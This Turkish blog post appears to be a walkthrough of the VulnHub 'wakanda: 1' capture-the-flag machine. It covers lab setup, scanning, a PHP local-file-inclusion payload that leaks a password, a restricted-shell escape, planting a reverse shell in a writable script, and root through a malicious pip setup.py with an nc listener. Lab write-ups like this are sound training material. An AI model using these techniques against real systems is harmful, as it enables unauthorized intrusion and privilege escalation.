---
layout: post
title:  "Wakanda Walkthrough"
tags: [vulnhub, box]
---

# Wakanda Walkthrough

Bu yazımda [**VulnHub**](https://www.vulnhub.com/) da bulunan [**wakanda: 1**](https://www.vulnhub.com/entry/wakanda-1,251/) adlı makinenin çözümünü anlatacağım. Amacımız makinede bulunan **flag1.txt**, **flag2.txt** ve son olarak da **root.txt** yi bulup okumak.  
Bu seriye yeni başladığım için lab ortamını nasıl kurduğumdan kısaca bahsetmek istiyorum.  
Ben lab ortamını **Virtualbox** üzerinden kurduğum için anlatımlar o yönde olacaktır. Vmware için de benzer adımlar vardır.  
VirtualBoxı açtıktan sonra üstteki menüden **File** sekmesi altında **Import Appliance** seçeneğini seçiyoruz.  
Karşımıza çıkan ekranda indirmiş olduğumuz **wakanda-1.ova** isimli dosyanın konumunu belirliyoruz.

![s1.png](/assets/img/vulnhub/wakanda/s1.png)

Default ayarlarla makineyi import ediyoruz.

![01.png](/assets/img/vulnhub/wakanda/01.png)

Şimdi lokal ağımızı oluşturmak için yine **File** sekmesinden **Host Network Manager** a tıklıyoruz. Karşımıza çıkan ekrandan sol taraftaki **Create** butonuna basıyoruz. Program bizim için sanal makineler arasında kullanabilmek için sanal bir adaptör tanımladı. Ayarların aşağıdaki şekilde olması gerekiyor.

![03.png](/assets/img/vulnhub/wakanda/03.png)
>DHCP Serverın aktif olmasına dikkat edin, aktif olmadığı durumlarda zafiyetli makine otomatik olarak ip alamayacaktır.

![04.png](/assets/img/vulnhub/wakanda/04.png)  
DHCP ayarlarında görüldüğü üzere Server adresini **192.168.56.100** olarak ayarladık ve bu adaptöre bağlanacak olan cihazların **192.168.56.101-254** arası ip almasını sağladık.

Şimdi makinenin network ayarlarını yapmamız gerekiyor. Makineyi sol listeden seçip ayarlarına gidiyoruz.

![02.png](/assets/img/vulnhub/wakanda/02.png)

Sol listeden **Network**ü seçip **Host-only Adapter**i seçip kurduğumuz **vboxnet0**'ı seçiyoruz.

![05.png](/assets/img/vulnhub/wakanda/05.png)

Zafiyet taraması yapmak için kullandığım **Parrot OS** virtualbox üzerinde kurulu olduğu için network ayarlarını yapmamız gerekiyor. Bu makinede internet bağlantısına ihtiyacım olduğu için 2 tane adaptör bağlamam gerekiyor. Parrot OS un network ayarlarına gidip birinci adaptörü **NAT** olarak ayarlıyorum.

![06.png](/assets/img/vulnhub/wakanda/06.png)

İkinci Adaptörü de **vboxnet0** olarak ayarlıyorum.

![s2.png](/assets/img/vulnhub/wakanda/s2.png)

Zafiyetli makine çalıştıktan sonra karşımıza böyle bir ekran geldi.

![07.png](/assets/img/vulnhub/wakanda/07.png)

Zafiyet taramasını yapmak için Parrot OS kurulu olan makineyi de çalıştırıp ağ arayüzlerine bakmak için

```bash
mnykmct@parrot:~$ ifconfig
```

komutunu kullanıyorum.

![08.png](/assets/img/vulnhub/wakanda/08.png)
>**eth0**: İnternete çıkabilmek için kullandığımız NAT ağına bağlı olan arayüz.
>**eth1**: Zafiyetli makine olan wakanda nın bağlı olduğu arayüz.

**eth1** arayüzünde hangi cihazların ip adresi aldığına bakalım.

```bash
mnykmct@parrot:~$ sudo netdiscover -i eth1 -r 192.168.56.0/24
```

![09.png](/assets/img/vulnhub/wakanda/09.png)
>**Hedef IP : 192.168.56.101**

Makinede hangi portların açık olduğuna bakalım.

```bash
mnykmct@parrot:~/wakanda$ sudo nmap -sS -sV -T4 -p- 192.168.56.101 -o wakanda.nmap
```

![11.png](/assets/img/vulnhub/wakanda/11.png)
>**-sS**: Port üzerindeki servisleri belirler.
>**-sV**: Belirlenen servislerin versiyon numaralarını belirler.
>**-T4**: Taramanın hızını belirler ( 0-5 ) arası değer alır.
>**-p-**: Bütün portları (0-65535) tarar.
>**-o**: Çıktıyı yönlendirir.

Nmap çıktısına göre 80 portunda **HTTP** servisi çalışıyor yani bizi bir web sayfası karşılayacak. Büyük ihtimalle bir kullanıcı adı ve şifre bularak **SSH** bağlantısı yapmamız gerekecek.

Tarayıcıdan, yayınlanan sayfaya gidelim.

![12.png](/assets/img/vulnhub/wakanda/12.png)

Tamamen statik bir web sayfası karşıladı bizi. En altta **@mamadou** yazıyor belki kullanıcı adı olabilir. Sayfadaki linklerden herhangi bir yere gidilmiyor o zaman sayfanın kaynak kodunu inceleyelim.

![13.png](/assets/img/vulnhub/wakanda/13.png)  
Sayfanın kaynak kodundaki yorum kısmı dikkat çekiyor. Index sayfasında kullanılabilen bir parametre.

Şimdi anasayfada bir dizin taraması yapalım.

```bash
mnykmct@parrot:~/wakanda$ dirb "http://192.168.56.101/"
```

![14.png](/assets/img/vulnhub/wakanda/14.png)
>index.php diye bir sayfa buldu. Bu bizim index sayfamız oluyor.

Bir önceki adımda bulduğumuz ?lang=fr parametresini index.php üzerinde kullanalım.

![s3.png](/assets/img/vulnhub/wakanda/s3.png)

Ortadaki açıklama yazısının değiştiğini görüyoruz ama elimizde hala bişey yok. Dizin taramasını biraz daha özelleştirip tekrarlayalım.

```bash
mnykmct@parrot:~/wakanda$ dirb "http://192.168.56.101/" -X ".php"
```

![15.png](/assets/img/vulnhub/wakanda/15.png)
>**-X**: özel dosya uzantılarını belirtmek için kullanılır.

Çıktıda **fr.php** diye bir dosya gözüküyor. Demek ki **lang** parametresi ile çağırdığımız şey aslında bir dosya.
Tarayıcıda **lang=fr** den hemen sonra bir **tek tırnak (')** koyalım.

![16.png](/assets/img/vulnhub/wakanda/16.png)
Coming soon un altında yazan yazı tamamen kayboldu. Burada **Php** de çalışan ve dışarıdan dosyaları okumamıza yarayan bir zafiyet olan **Local File Inclusion** zafiyeti olabilir.

[LFI Cheat Sheet](https://highon.coffee/blog/lfi-cheat-sheet/) sayfasında bulunan kodları biraz inceledikten sonra istediğimi buluyorum.

![18.png](/assets/img/vulnhub/wakanda/18.png)
>[http://192.168.56.101/index.php?lang=php://filter/convert.base64-encode/resource=index](http://192.168.56.101/index.php?lang=php://filter/convert.base64-encode/resource=index)
>Burada index sayfasının kaynak kodunu base64 ile kodlayarak çektik.

Base64 olan kodu decode ediyorum.

```bash
mnykmct@parrot:~/wakanda$ echo -n "base64kod" | base64 -d
```

![20.png](/assets/img/vulnhub/wakanda/20.png)

![21.png](/assets/img/vulnhub/wakanda/21.png)

Orada bir parola var sanki ...

Önceki adımlarda da mamadou diye bir kullanıcı ismi bulmuştuk. **mamadou** adlı kullanıcıya **SSH** bağlantısı kurmaya çalışalım.

```bash
mnykmct@parrot:~/wakanda$ ssh mamadou@192.168.56.101 -p 3333
```

![22.png](/assets/img/vulnhub/wakanda/22.png)

Bingo! Bağlantıyı sağladık ama şimdi de Python kabuğuna giriş yaptı.

Buradan kurtulmak için ufak bi kod yazalım.

```python
>>> import os
>>> os.system("/bin/bash")
```

![24.png](/assets/img/vulnhub/wakanda/24.png)

Bulunduğumuz dizindeki dosyaları tarayalım. İlk flag olan **flag1.txt** yi ele geçirmiş olduk.

```bash
mamadou@Wakanda1:~$ ls
mamadou@Wakanda1:~$ cat flag1.txt
```

![25.png](/assets/img/vulnhub/wakanda/25.png)

Diğer flagi bulmadan önce sistem hakkında yararlı olabilecek bilgileri ele geçirmeye çalışalım. Bunun için **[LinEnum.sh](https://github.com/rebootuser/LinEnum/blob/master/LinEnum.sh)** dosyasını indirelim. Zafiyetli makinemiz internete çıkamadığı için Parrottan indirip zafiyetli makineye Python aracılığı ile aktaracağız.

```bash
mnykmct@parrot:~/vulns/wakanda$ wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh
mnykmct@parrot:~/vulns/wakanda$ python -m SimpleHTTPServer
```

![28.png](/assets/img/vulnhub/wakanda/28.png)
>SimpleHTTPServer default olarak 8000 portundan yayın yapıyor.

Zafiyetli makineden dosyayı wget ile çekip chmod ile çalıştırma iznini verdikten sonra çalıştırıyoruz.

```bash
mamadou@Wakanda1:~$ wget 192.168.56.102:8000/LinEnum.sh
mamadou@Wakanda1:~$ chmod +x LinEnum.sh
mamadou@Wakanda1:~$ ./LinEnum.sh
```

![29.png](/assets/img/vulnhub/wakanda/29.png)

Programın bize verdiği düzenlenmiş çıktıların arasında **/etc/passwd**nin çıktısına göre sistemde **devops** adında bir kullanıcının daha olduğunu öğreniyoruz.

![30.png](/assets/img/vulnhub/wakanda/30.png)

O zaman **/home/devops** dizininde neler olduğuna bir bakıp varsa dosyaları okumaya çalışalım.

```bash
mamadou@Wakanda1:~$ cd ../devops/
mamadou@Wakanda1:/home/devops$ ls -al
mamadou@Wakanda1:/home/devops$ cat flag2.txt
```

![32.png](/assets/img/vulnhub/wakanda/32.png)
>**flag2.txt** yi bulduk ama okuyamıyoruz.

Devops'a ait olan başka dizindeki dosyaları bulmaya çalışalım.

```bash
mamadou@Wakanda1:/home/devops$ find / -user devops -name ".*"
```

![36.png](/assets/img/vulnhub/wakanda/36.png)
>/srv dizini altında gizli bir dosya var.

Dosyanın içeriğini okuduğumuzda **/tmp** dizini altında test adlı bir dosyayı açıp içine test yazdığını anlıyoruz.

![37.png](/assets/img/vulnhub/wakanda/37.png)

/tmp dizinini kontrol ettiğimizde ise gerçekten de dosyanın orada olduğunu anlıyoruz. O zaman bunun içine pythonca bir reverse shell ekleyelim. [**Reverse Shell**](http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet) e gidip pyhton için olan scripti alıyoruz ve kendimize göre düzenleyip **.antivirus.py** dosyasının içine yazıyoruz.

```bash
 mamadou@Wakanda1:/srv$ nano .antivirus.py
```

![39.png](/assets/img/vulnhub/wakanda/39.png)
> 192.168.56.102: Zafiyet taraması için kullandığım Parrot OSun IPsi

Parrottan, önceki adımda ayarlamış olduğumuz şekilde **1234** portunu dinlemeye başlıyoruz. Zafiyetli makineyi baştan başlattığımızda devops komut satırına erişmiş oluyoruz.

![40.png](/assets/img/vulnhub/wakanda/40.png)

Şimdi de ikinci flagi okuyalım.

```bash
devops@Wakanda1:~$ cd
devops@Wakanda1:~$ ls
devops@Wakanda1:~$ cat flag2.txt
```

![41.png](/assets/img/vulnhub/wakanda/41.png)

Enumeration için mamadou kullanıcısında yaptığımız gibi bunda da LinEnum.sh dosyasını çalıştıralım.

```bash
devops@Wakanda1:~$ ../mamadou/LinEnum.sh
```

![42.png](/assets/img/vulnhub/wakanda/42.png)

mamadou sudo kullanıcı olmadığı için **/etc/sudoers** dosyasını da okuyamamıştık. Şimdi o dosyanın içinde **/usr/bin/pip** programını parolasız bir şekilde root yetkileri ile çalıştırabildiğimizi yazdığını öğreniyoruz.

![43.png](/assets/img/vulnhub/wakanda/43.png)
>Pip, Pythonda üçüncü parti uygulamaları yüklememizi sağlayan bir scripttir.

Bu programı kullanarak root yetkisi elde etmeye çalışacağız. Bunun için internette biraz araştırma yaptıktan sonra şöyle bir site buldum.

![44.png](/assets/img/vulnhub/wakanda/44.png)

Buradaki anlatımı dikkate alarak Parrotta setup.py adlı bir dosya oluşturup SimpleHTTPServer ile zafiyetli makineye aktardım.

![45.png](/assets/img/vulnhub/wakanda/45.png)
> setup.py nin içeriği bu şekilde olacak.
> change this yazan yere Parrot OS un IPsini yazdık.

![46.png](/assets/img/vulnhub/wakanda/46.png)

Şimdi de Parrot da farklı bir terminal açıp 443. portu dinleyelim. Çünkü reverse shellimiz bu port üzerinden çalışıyor.

```bash
mnykmct@parrot:~/wakanda$ sudo nc -nlvp 443
```

FakePip de verilen adımları uygulayarak fakepip adlı klasöre, indirdiğimiz setup.py dosyasını attık. Ardından fakepip dizinine giriş yapıp asıl kodumuzu çalıştırıyoruz.

```bash
devops@Wakanda1:~$ mkdir fakepip
devops@Wakanda1:~$ mv setup.py fakepip
devops@Wakanda1:~$ cd fakepip
devops@Wakanda1:~/fakepip$ sudo /usr/bin/pip install . --upgrade --force-reinstall
```

![47.png](/assets/img/vulnhub/wakanda/47.png)

Kod çalışınca Parrota da 443. port üzerinden reverse shell gelmiş oldu.

![48.png](/assets/img/vulnhub/wakanda/48.png)

**root.txt** yi de ele geçirmiş olduk.